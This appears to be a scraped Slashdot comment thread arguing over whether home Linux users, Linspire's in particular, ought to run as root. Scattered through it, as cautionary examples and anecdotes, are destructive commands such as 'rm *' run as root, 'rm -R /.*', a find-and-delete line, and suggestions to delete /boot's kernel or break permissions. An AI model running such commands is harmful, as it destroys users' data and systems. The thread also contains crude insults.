The Right Thing [tm] to do is to make it easier for home users to live with security, rather than just remove security. OS X manages this decently, why can't Linspire?
A plugin that would let Gecko-based browsers use quite possibly the most fundamentally-flawed piece of software ever to have been written?
Gee, who'da thunk it?
Endemic. I do not think it means what you think it means.
"The Milliard Gargantubrain? A mere abacus - mention it not."
None of that stuff applies to a Lindows box. This isn't the mainframe days anymore, Lindows is not a mainframe.
The "the point of why we do things a certain way" is that in the old days when things were different (eg 2 computers on the whole school campus) it used to make sense.
"as root you can still get in and fix it, completely" - yeah, I'd like to see a Lindows user try and do that.
Try put the CD in the drive, click reinstall.
The only reason you thought up that's potentially arguable is not being able to run services below port 1000, specifically port 25, but does that really matter when the box can still connect to port 25, and accept incoming connections on higher ports? It can still be a zombie on user privileges.
At the risk of getting modded as Redundant, I'll say it... Certain things can't be done as regular users and needs root privileges. Lindows (or Linspire or whatever) wants to dumb down things and so wants to avoid asking password prompts and such. Therefore Lindows either already logs in the main regular user as root or it wants to do it in the future (I don't know, I've never used it). Of course, pretty much every Linux newbie site and every Linux user says that doing normal things as root is bad and stupid. This makes Lindows look bad in the eye of its users and in the eyes of experienced people and the media. Therefore it wants to start spreading shit that root is safe and people who disagree are paranoid and idiots.
(Although I don't like getting modded down, I do hope this post is redundant and everyone did know this point)
Everyone here knows his was a stupid quote, but from a marketing standpoint, it's valid... None of us are going to buy Linspire -- we'll run our slack/deb/rh/fedora -- but, cheap newbies will, and to them, it's no different than running their existing OS, Windows 98...
There's no chance Robertson actually means what he's saying though. The CEO of a linux company can't possibly be that stupid.
Just for the sake of repeating myself, don't assume that every computer in the world is a server, and/or that everyone must be running a l33t multi-user system with 500 different accounts define.
/. nerd is proud of, is just a waste of any normal user's time.
:)"
A normal user's home computer is a very different beast. Normal users don't measure their e-penis in number of uptime hours or number of l33t server processes on their system. Most of that l33t stuff that your average
The average normal user doesn't have a server or thousands of user accounts on his/her server. And has no intention of going that route. Now in that context:
"Running as root is like pointing a loaded gun at everyone just in case they're a criminal."
Yes, except there is noone else on that computer. So it's more like pointing around a gun in your own concrete basement, with noone else around. Whop-de-do, that must be sooo good a reason to not run as root. Not.
"Running as root is like driving down the highway with your hood open and your oil cap off."
Except it's on your own private strip of road, and noone else has any business to be on that road to start with. So the problem is?
" Running as root is like posting to slashdot without reading TFA.
Except it's a post in your own private diary. So the problem is?
A polar bear is a cartesian bear after a coordinate transform.
Of course you can't INSTALL it without Admin, that's the whole point of Admin! You can still USE Firefox on a user account.
Freedom: "I won't!"
He's full of shit. Even Mac OS X, the quintessentially "easy to use, just works" OS, requires you to type in the administrator (similiar but not the same as root) password before installing new software or OS updates. Granted, they do give "administrative users" access to the /Applications directory, so the default non-root user can copy apps to /Applications in those cases where drag-and-drop is all you need, rather than an install wizard.
The idea that everyone should "just run as root" is asinine and toxic. People like this, and the distributions they create implimenting this philosophy, will give Linux a bad name security wise, and probably become the Microsoft posterchild for how Linux doesn't measure up to its "hype." He'll give the disinformationists in Redmond something to hang their deceptive hats on, and damage the reputation of hundreds of distributions that are more secure than windows ever will be because they don't succumb to the least common denominator.
The Future of Human Evolution: Autonomy
Compuserve did not "hold the patent", Sperry (by then Unisys) did. Compuserve merely licensed the patent. See, for example, amongst many other web resources, http://www.kyz.uklinux.net/giflzw.php and http://lpf.ai.mit.edu/Patents/Gif/Gif.html Just being pedantic, but the idea of Compuserve ever coming up with something patentable was mind-boggling...
There is a huge difference between mission critical software and end user systems.
I have never, and will never I'm quite sure, see any deaths related to some end users Dell system kill them because Outlook Express crashed on them.
Once again, your comparing apples and oranges.
Really, I know what I'm doing...Ohhhh, look at the shiny buttons!
Michael Robertson's market is rather different from the typical Linux market. He's trying to sell an end user commodity.
The end user does not give a fuckola about permissions, user management, and the meaning of the word "root". Insecure? Yeah, a little.
If a regular user runs a malicious program, they've already risked all of their own data. The system itself is "safe", but many of the reasons people 0wn Windows boxes can be satisfied just by having user privileges. It can be used as a spam conduit. It can be used in a DDoS attack. It can give the keys to someone else so they can try a local exploit to gain root, or it may have a set of local exploits built in to elevate to root right there.
Running any malicious code represents some kind of compromise. The argument for running it as a non-privileged user vs. root user is just one about dampening the impact, but just slightly.
On the other hand, running everything as root makes the end user experience a lot more comfortable. Security is inconvenient.
He's such a lame fucker. He doesnt know a shit of
security. Even a kid nowadays has an answer of why running a root is unsafe. damn bitch
You have to make choices in life. Your company chose to go the Microsoft route, and now they are a little stuck. There are many reasons that OpenOffice etc. don't support these MS solutions. Yes a few of them are a little pathetic (eg. "I aint supporting no MS shit!"). But this is just how it is.
So you choose the MS way, the Open Source way, or perhaps a company that has a solution and doesn't believe in lock-in.
Once you've chosen you have to eat what you've picked; there's no point whinging about it afterwards.
No, it's exactly as secure as I think - and I even said that it wasn't a perfect implementation in my post - I just think it's a brilliant model.
The "right" answer to your complaint is to make the default admin account that is admin but isn't wheel - it'll just make you sudo more things. I agree with you about this detail, but it's an implementation detail, not a flaw in the model.
Also, of course, the OSX firewall is a packet filter (pf, I believe) and a GUI. The GUI might not set the filter to block UDP but the underlying filter definitely does. So you definitely could fix this without installing any software. Still an Apple failure? Definitely. Better than the Windows equivalent structure? Also definitely.
Looking for freelance Actionscript (Flash/Flex) or ColdFusion work and/or freelance developers. Email me, put Slashdot
don't assume that every computer in the world is a server, and/or that everyone must be running a l33t multi-user system with 500 different accounts define
Nice straw man. You shouldn't assume that most computers are only used by one person.
Most people live in a household with *MORE THAN ONE PERSON*, and when these people have a computer, it will *MORE OFTEN THAN NOT* be shared with the other members of the household.
You don't need 500+ people on a system for it to be multi-user. You only need *TWO*. That's it - just two people.
Ask someone "hey, you won't mind if your brother accidentally deletes all your files, right?" And you'll get a "of course I mind."
The argument that data is more important than the system isn't relevant to most computers - it only matters if you can guarantee that *NOBODY* else will be using your computer.
Now, in *YOUR* case, that may be true, but don't assume that because it's true in your case, that it's true in everybody's case.
The stupidity of this position is very easy to explain. He's claiming that the worst thing (losing user data) is the only thing to worry about. Since non-root doesn't prevent that, let's get rid of it.
To use his own analogy, if the worst thing that can happen in a car is to run into a wall, then why have door locks? Whether you have locks on the door or not, you're still going to die. And they make it hard to get into the car, so let's get rid of them.
What is this fixation with this command? I can think of a much more widespread example of why running as root is not secure: Anything you launch runs with root privileges. That means a fast-track route for anything even slightly malicious (worms, trojans, spyware) to your kernel. Please don't tell me they don't exist; if this running as root becomes widespread, think of the 1337-ness factor of being the VX-er who trashed a few thousand Linux boxen.
/var/log 400. Try chowning someone's home directory. Try deleting the kernel from /boot. Try changing root's shell and then deleting the shell binary (or one of its dependencies if it's dynamically linked) and dropping to single-user mode.
If you think about the "root" username in terms of Australian slang, you'll get the idea: You *can* root your system using it in many ways that aren't immediately apparent. Try, for example, chmoding
It looks to me like a case of SELECT FROM Linspire_employees WHERE CLUE > 0
No records found.
No offence to anyone working for Linspire, but if you don't tell your boss he's a jerk and needs a good dose of clue stick #10, you're as clueless as he is.
Between this little statement and Linus having a go at Tridge, I'm becoming more and more pleased with my own choice of open source OS. Please tell me these guys are going to stop before they destroy any good that they have done. If it wasn't for Linux, we'd have hardly any applications to run.
Resistance is futile. Reactance buggers it up.
Notice what he says: "Nobody really has a good answer." That should be your first clue that someone is falling down on the job and not giving the boss the right advice. Or maybe someone is afraid to tell the boss something he might not want to hear.
The comment "I defy anybody to tell me why is it more secure to not run as root." is another way of telling me to send him my resume. It's also a opportunity for a smart consultant out there to land themselves a nice contract.
And "I would imagine a few Slashdotters would dispute that." tells me he is smart enough to get the user community talking about this problem and seeing what solutions come out of the woodwork. Once he hears a good idea, it's time to get "his people working on that" and come out with a new product without paying royalties for the idea. Just another way to do low-cost research. Not the first time it's been done.
Just my 3.14 cents worth.
...it's evil. :D
:D
A looooong time ago in a galaxy far, far away when I was in college, there was a graduate student (Bill Crossman, if I recall, was his name) who one day decided to clear out his home directory before packing up to go home for the summer. So he typed "rm *" at the shell command line and thought all was good.
He forgot he had logged in as root.
From that point on he was known as "arr emm star Crossman"
Learning it is the happiest you can be in linux when not surfing for porn.
/. -type f -name *.tar -exec rm {} \;
find
Never confuse volume with power.
The problem with this statement is that the man's idea of security is too simplistic. He sees the only security threat worth worrying about as stealing, altering, or erasing the user's data. Certainly this is a valid concern, and if it truly were the only thing to worry about on the Net then his complaint would be valid. Where it falls on its face, however, is the plain and simple fact that this is not the only thing to be concerned about, security-wise.
Nowadays, many malware authors don't actually care much about any data that's stored on disk. It's the data you enter every day, often without realizing it, that's [i]really[/i] interesting. What sites you visit, what ads you respond to, and such: these can be gleaned from history files with some success, but by the time you get that data it's already out of date. Getting it in realtime is better, and this is what spyware does.
Even this, however, is not the only reason malware exists. Very often, what malware authors want isn't even your data; they want your computer itself. That's what zombie networks are, essentially. This allows The Bad Guys (be they crackers, spammers, or whatever) to make use of your machine to perform their nefarious activities, and the hell of it is that they can do it in ways that make it look like you're the culprit.
Of course, even this doesn't cover everything. Adware doesn't usually bother to collect data (though it can), and often doesn't act as a zombie: it's just there to shove even more ads in your face. Yes, this is more annoying than destructive, but it's still malicious.
The point of all this: Data may be king, but a king is nothing without his court. That's the problem with this man: he's too ignorant to see any security problems outside of data theft. As a result, he advocates irresponsible computing, seeing no harm not because there isn't any harm -for there is- but because his concept of harm is not broad enough.
With cars, there's a clear middle ground. I don't know shit about fixing the damn thing, but I know when to get the oil changed and I know to take it to the shop when a light comes on.
With computers, you have people who think any idiot should be able to use it without "oil changes" (security updates), and gear-heads who think you should be able to build a computer from scratch before you're allowed to use it. Both are wrong.
Slow down, cowboy! It has been 4 hours since you last posted. You must wait another few hours.
Yes, it is very difficult to configure, but the system policy and other aspects of NT security provide extremely fine-grained control over what users, applications, machines, etc may or may not do.
.NET allows applications to demand, request, or refuse permissions, so if the developer chooses to, the program will say upon startup "I am an E-Mail program and want to access nothing but my data folder." Then, (provided there are no holes in .NET) if there is a security hole in the app that would allow an attacker to, say, connect to IRC, the .NET security model will refuse this connection.
Now if only it were pre-configured out of the box. But of course the minute Microsoft were to announce that any third-party application must be validated by MS to determine its default security rights, everyone would complain that MS gets to decide which programs make it to market.
Also,
They want the big bucks for their "professional" OS, they accept the responsibility for making it work.
If I want to "take steps to fix it", I'll run Gimp on Linux where it just works, and I can fix it (or pay someone to) when it doesn't.
Forget diamonds, copyright is forever.
Installing software more often than not alters the Windows OS configuration by way of registry writes (and changes to Program Files). Requiring Administrator rights for that is perfectly reasonable and often preferrable. However, once installed, software like Firefox should not require Administrative rights to run.
So, to recap, software installers make fundamental OS configuration changes and thus are fine when restricted to Admin users. The software that they install, however, should be accessable by anyone unless specifically denied by the system Admin unless the software is specifically designed to alter hardware or OS config.
STOP MISUSING APOSTROPHES, YOU MORONS!!!
I would like to bring attention to this man. Michael Robertson was the founder of MP3.com, and consequently is the man who single-handledly drove it into the ground and sold out to Universal. This guy is a joke, plain and simple. A stubborn fool who is desperate to sell another big success like MP3.com was in its prime.
Leave him and his Linspire alone. He doesn't "get it", he's just good at telling outrageous stories in an attempt to gain mindshare.
-Billco, Fnarg.com
The thread covers most of the reasons why working as root is just bad and dangerous. The two most important for me are typos on /bin/rm calls and unaudited software.
So far I didn't know what to think of Robertson. Now I am confident he's an idiot.
echo mailto: !#^."<*>"|tr "<*> mailto:" net@madduck
The debate at hand is wether to have them always being root for everything all the time without even logging in, or being a normal user and have apps that need root privileges run sudo in the background. Of course sudo lets you be root, for single commands as needed. Beats the fuck out of leaving these inexperienced users just running as root all the time doesn't it? You aren't just wildly off track, you are completely and hopelessly lost.
I hear Ubuntu praised a lot for its approach, but it doesn't really do much to discourage users from running shell commands as root. Every user has access to the "Root Terminal" application, right in the Gnome menus. All it takes is your password (that's your own password, assuming you were the default user created during install, because that user is automatically placed on the sudo list) and you're free to do whatever you want as root. Get into lazy habits (i.e. choosing "Root Terminal" instead of the regular terminal when you want to do system maintenance tasks that might require root privileges) and the supposed no-root-account protections of Ubuntu are out the window.
Breakfast served all day!
/., once again proving the hypothesis that the best way to get a lot of information is to say something wrong on the internet.
Thanks, all : )
Looking for freelance Actionscript (Flash/Flex) or ColdFusion work and/or freelance developers. Email me, put Slashdot
Case and point, I set my wife as a lua user on our windows xp box at home and she still hasn't noticed any difference.
"You can now flame me, I am full of love,"
On a NeXT machine. The NeXT desktop was dropping .desktop and other hidden files and directories all over the place and it had left some in root that I wanted to get rid of. Since they were directories and there was nothing else starting with dot, I typed "rm -R /.*". Stopped it after I noticed it was still churning after a minute, but by then the system was trashed.
The answer is that
... ? Luckily, I kept backups :( .
1. hitting Ctrl-C stops it, but what is gone is gone (I don't know about restoring from inodes or whatever), and
2. how much you loose, and what gets lost depends on how quickly you realise, and what you have placed in that directory.
The problem is that you are never really sure what got lost! What did I have in that root directory? Didn't I put something important there 3 months ago when I was doing
I have done this. It is all too easy, even if you are consistently careful.